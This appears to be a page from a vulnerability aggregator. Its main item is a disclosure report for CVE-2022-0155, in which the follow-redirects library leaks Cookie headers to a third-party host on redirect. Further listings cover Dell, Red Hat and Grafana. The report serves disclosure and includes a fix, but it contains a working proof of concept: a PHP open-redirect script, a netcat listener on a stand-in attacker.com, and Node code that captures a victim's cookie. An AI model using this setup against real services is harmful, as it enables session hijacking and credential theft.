Headline

CVE-2022-0155: Exposure of Private Personal Information to an Unauthorized Actor in follow-redirects

follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor

2 years ago

CVE

Open in Source

#web #js #git #php #auth

BUG

Cookie header leaked to third party site and it allow to hijack victim account

SUMMURY

When fetching a remote url with Cookie if it get Location response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.
Ex: you try to fetch example.com with cookie and if it get redirect url to attacker.com then it fetch that redirect url with provided cookie .
So, Cookie of example.com is leaked to attacker.com .
Cookie is standard way to authentication into webapp and you should not leak to other site .
All browser follow same-origin-policy so that when redirect happen browser does not send cookie of example.com to attacker.com .

FLOW

if you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .

First setup a webserver and a netcat listner

http://mysite.com/redirect.php?url=http://attacker.com:8182/

//redirect.php
<?php
$url=$_GET["url"];
header("Location: $url");

/* Make sure that code below does not get executed when we redirect. */
exit;
?>

netcat listner in http://attacker.com

nc -lnvp 8182

STEP TO RERPODUCE

run bellow code

const { http, https } = require('follow-redirects');
//https://github.com/follow-redirects/follow-redirects
const data = JSON.stringify({
    name: 'John Doe',
    job: 'DevOps Specialist'
});

const options = {
    protocol: 'http:',
    hostname: 'mysite.com',
    port: 80,
    path: '/redirect.php?url=http://attacker.com:8182/mm',
    method: 'GET',
    headers: {
        'Content-Type': 'application/json'
        ,'Cookie': 'dsf=sdf',
        "Authorization":"Basic dsfddsf"
    }
};


const req = http.request(options, (res) => {
    let data = '';

    res.on('data', (chunk) => {
        data += chunk;
    });

    res.on('end', () => {
        console.log(data);
    });

}).on("error", (err) => {
    console.log("Error: ", err.message);
});

//req.write(data);
req.end();

response received in attacker netcat

Connection from 127.0.0.1 56060 received!
GET /mm HTTP/1.1
Content-Type: application/json
Cookie: dsf=sdf
Host: localhost:8182
Connection: close

here see in this response ,it leaked cookie to thirdparty site attacker.com when redirecting .

So, here i provided cookie for mysite.com but due to redirect it leaks to thirdparty site attacker.com

As the redirect happen automatically via follow-redirects, user cant control where to send cookie or where to not sent .
If cookie is provided then cookie will be sent to any redirect url either it same domain url or not .\

SUGGESTED FIX

If provided url domain and redirect url domain is same then you can only send cookie header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie header.

Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.

1 year ago

CVE

Open in Source

#sql #vulnerability #web #google #linux #apache #nodejs #js #git #java #kubernetes #samba #pdf #log4j #ssh #dell #mongo #postgres #ssl

Red Hat Security Advisory 2022-8502-01

Red Hat Security Advisory 2022-8502-01 - The ovirt-engine package provides the Red Hat Virtualization Manager, a centralized management platform that allows system administrators to view and manage virtual machines. The Manager provides a comprehensive range of features including search capabilities, resource management, live migrations, and virtual infrastructure provisioning.

2 years ago

Packet Storm

Open in Source

#vulnerability #web #mac #red_hat #nodejs #pdf #auth #rpm

RHSA-2022:8502: Red Hat Security Advisory: RHV Manager (ovirt-engine) [ovirt-4.5.3] bug fix and security update

Updated ovirt-engine packages that fix several bugs and add various enhancements are now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-0155: follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor * CVE-2022-2805: ovirt-engine: RHVM admin password is logged unfiltered when using otopi-style

2 years ago

Red Hat Security Data

Open in Source

#vulnerability #web #mac #linux #red_hat #nodejs #js #java #kubernetes #aws #auth #rpm

CVE-2020-11110: grafana/CHANGELOG.md at main · grafana/grafana

Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.